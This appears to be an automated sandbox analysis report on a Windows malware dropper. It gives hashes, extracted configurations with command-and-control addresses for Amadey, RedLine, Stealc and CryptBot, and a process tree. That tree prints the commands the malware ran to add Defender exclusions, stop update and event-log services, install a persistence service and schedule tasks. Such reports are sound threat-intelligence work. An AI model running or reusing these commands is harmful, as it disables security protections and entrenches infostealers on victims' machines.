Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-09-2024 01:21

General

  • Target

    714426ebe0f2d80b82a3a02bf88521178c1ae511d9c4c004ee38dda3cca82ba0.exe

  • Size

    1.9MB

  • MD5

    e855429ab5c0aac783acddca221447a9

  • SHA1

    612af37f590eaab5721f848118aa01377d3b3762

  • SHA256

    714426ebe0f2d80b82a3a02bf88521178c1ae511d9c4c004ee38dda3cca82ba0

  • SHA512

    66f3710c2dbd1152b0522a5d317c588a5dc4f2c9a953a9850c1b40c08d9f2a7276d7c4ff8c440b1f6d5bd9f82522ac6aea3566dee31d1f90ebf4659c9c2a2b3e

  • SSDEEP

    49152:pRem3rsZoSWN7oieO+f0oS7g1hzHvcqALJ:px3rsaDGieO+3Ss3zHUqi

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

cryptbot

C2

fivevd5vs.top

analforeverlovyu.top

Attributes
  • url_path

    /v1/upload.php

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

91.194.55.146:29862

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 14 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 60 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 31 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 12 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1224
      • C:\Users\Admin\AppData\Local\Temp\714426ebe0f2d80b82a3a02bf88521178c1ae511d9c4c004ee38dda3cca82ba0.exe
        "C:\Users\Admin\AppData\Local\Temp\714426ebe0f2d80b82a3a02bf88521178c1ae511d9c4c004ee38dda3cca82ba0.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:948
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2520
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1476
          • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3016
            • C:\Users\Admin\AppData\Roaming\Yy5TzCBFKq.exe
              "C:\Users\Admin\AppData\Roaming\Yy5TzCBFKq.exe"
              5⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2864
            • C:\Users\Admin\AppData\Roaming\tALXg3M9fP.exe
              "C:\Users\Admin\AppData\Roaming\tALXg3M9fP.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2080
          • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2140
            • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
              "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2152
              • C:\Users\Admin\AppData\Local\Temp\1000045001\Office2024.exe
                "C:\Users\Admin\AppData\Local\Temp\1000045001\Office2024.exe"
                6⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                PID:2808
                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2412
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                  7⤵
                    PID:796
                    • C:\Windows\system32\wusa.exe
                      wusa /uninstall /kb:890830 /quiet /norestart
                      8⤵
                      • Drops file in Windows directory
                      PID:2280
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop UsoSvc
                    7⤵
                    • Launches sc.exe
                    PID:2212
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    7⤵
                    • Launches sc.exe
                    PID:2056
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop wuauserv
                    7⤵
                    • Launches sc.exe
                    PID:2416
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop bits
                    7⤵
                    • Launches sc.exe
                    PID:2272
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop dosvc
                    7⤵
                    • Launches sc.exe
                    PID:1588
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    7⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2684
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    7⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1756
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    7⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2024
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    7⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2084
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe delete "QKJNEQWA"
                    7⤵
                    • Launches sc.exe
                    PID:2572
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"
                    7⤵
                    • Launches sc.exe
                    PID:2132
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop eventlog
                    7⤵
                    • Launches sc.exe
                    PID:2792
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe start "QKJNEQWA"
                    7⤵
                    • Launches sc.exe
                    PID:2728
            • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
              "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:1144
            • C:\Users\Admin\AppData\Local\Temp\1000129001\2.exe
              "C:\Users\Admin\AppData\Local\Temp\1000129001\2.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              PID:2748
              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:968
              • C:\Windows\SysWOW64\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                5⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1600
            • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
              "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:2660
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                5⤵
                • Executes dropped EXE
                PID:2636
            • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
              "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2992
            • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
              "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1540
            • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
              "C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1596
            • C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
              "C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2188
            • C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
              "C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
              4⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              PID:2168
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
                5⤵
                • Loads dropped DLL
                PID:1940
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:648
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "wrsa opssvc"
                  6⤵
                    PID:1660
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    6⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2692
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                    6⤵
                      PID:1648
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 607698
                      6⤵
                        PID:2476
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr /V "MaskBathroomCompositionInjection" Participants
                        6⤵
                          PID:2672
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:1556
                        • C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
                          Waters.pif Q
                          6⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:1920
                        • C:\Windows\SysWOW64\choice.exe
                          choice /d y /t 5
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:324
                    • C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      PID:2064
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2720
                    • C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:2856
                      • C:\Users\Admin\AppData\Local\Temp\7zS9A7B.tmp\Install.exe
                        .\Install.exe
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:1536
                        • C:\Users\Admin\AppData\Local\Temp\7zS9C7E.tmp\Install.exe
                          .\Install.exe /oGdidRL "385121" /S
                          6⤵
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          • Enumerates system info in registry
                          PID:944
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            7⤵
                              PID:1320
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                8⤵
                                • Indirect Command Execution
                                PID:2832
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  9⤵
                                    PID:1736
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                      10⤵
                                        PID:2064
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                    8⤵
                                    • Indirect Command Execution
                                    PID:1996
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      9⤵
                                        PID:2388
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                          10⤵
                                            PID:1904
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                        8⤵
                                        • Indirect Command Execution
                                        PID:1764
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                          9⤵
                                            PID:728
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                              10⤵
                                                PID:2772
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                            8⤵
                                            • Indirect Command Execution
                                            PID:2940
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                              9⤵
                                                PID:1980
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                  10⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2456
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                              8⤵
                                              • Indirect Command Execution
                                              PID:924
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                9⤵
                                                  PID:2296
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                    10⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Drops file in System32 directory
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2044
                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                      11⤵
                                                        PID:2820
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                7⤵
                                                • Indirect Command Execution
                                                • System Location Discovery: System Language Discovery
                                                PID:2640
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1572
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                    9⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Drops file in System32 directory
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1476
                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                      10⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2580
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TN "bmbXFarNlpbNUcjZUs" /SC once /ST 01:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB\LEUXBcbvazrcGrF\tLyiuWA.exe\" NE /PkdidT 385121 /S" /V1 /F
                                                7⤵
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1032
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 552
                                                7⤵
                                                • Loads dropped DLL
                                                • Program crash
                                                PID:1696
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1740
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                        3⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2892
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
                                      2⤵
                                      • Drops startup file
                                      PID:1916
                                  • C:\Windows\system32\conhost.exe
                                    \??\C:\Windows\system32\conhost.exe "85198589216875149201535075457-267238359153151057115816279211919439047855801252"
                                    1⤵
                                      PID:1556
                                    • C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
                                      C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Drops file in System32 directory
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1772
                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:444
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        2⤵
                                          PID:980
                                          • C:\Windows\system32\wusa.exe
                                            wusa /uninstall /kb:890830 /quiet /norestart
                                            3⤵
                                            • Drops file in Windows directory
                                            PID:940
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop UsoSvc
                                          2⤵
                                          • Launches sc.exe
                                          PID:2124
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                          2⤵
                                          • Launches sc.exe
                                          PID:2168
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop wuauserv
                                          2⤵
                                          • Launches sc.exe
                                          PID:1104
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop bits
                                          2⤵
                                          • Launches sc.exe
                                          PID:2884
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop dosvc
                                          2⤵
                                          • Launches sc.exe
                                          PID:2988
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                          2⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:616
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                          2⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2592
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                          2⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2188
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                          2⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2688
                                        • C:\Windows\system32\conhost.exe
                                          C:\Windows\system32\conhost.exe
                                          2⤵
                                            PID:2892
                                          • C:\Windows\system32\cmd.exe
                                            cmd.exe
                                            2⤵
                                            • Blocklisted process makes network request
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2764
                                        • C:\Windows\system32\conhost.exe
